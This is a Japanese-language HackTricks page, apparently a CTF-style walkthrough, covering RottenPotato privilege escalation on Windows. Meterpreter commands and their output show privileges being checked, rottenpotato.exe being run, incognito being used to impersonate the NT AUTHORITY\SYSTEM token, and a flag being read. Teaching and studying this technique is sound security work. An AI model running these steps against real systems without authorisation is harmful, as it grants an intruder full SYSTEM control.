hacktricks/windows-hardening/windows-local-privilege-escalation/rottenpotato.md
2023-07-07 23:42:27 +00:00

6.4 KiB
Raw Blame History

RottenPotato

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

このページの情報は、この投稿から抽出されました。

サービスアカウントには通常、特権SeImpersonatePrivilegesがあり、これを使用して特権をエスカレーションすることができます。

https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

この脆弱性がどのように機能するかの詳細については説明しませんが、上記の記事は私が説明するよりもはるかに詳しいです。

メータープリンターで特権を確認しましょう:

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege

素晴らしい、攻撃を実行するために必要な特権を持っているようです。rottenpotato.exeをアップロードしましょう。

メータープリターセッションに戻り、incognito拡張機能をロードします。

meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
NT SERVICE\SQLTELEMETRY
TALLY\Sarah

Impersonation Tokens Available
========================================
No tokens available

現在、私たちはインパーソネーション トークンを持っていないことがわかります。Rotten Potato exploitを実行しましょう。

meterpreter > execute -f rottenpotato.exe -Hc
Process 3104 created.
Channel 2 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
NT SERVICE\SQLTELEMETRY
TALLY\Sarah

Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM

私たちはトークンを素早く偽装する必要があります。そうしないと、トークンは消えてしまいます。

meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

成功しましたSYSTEMシェルを取得し、root.txtファイルを取得できました

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥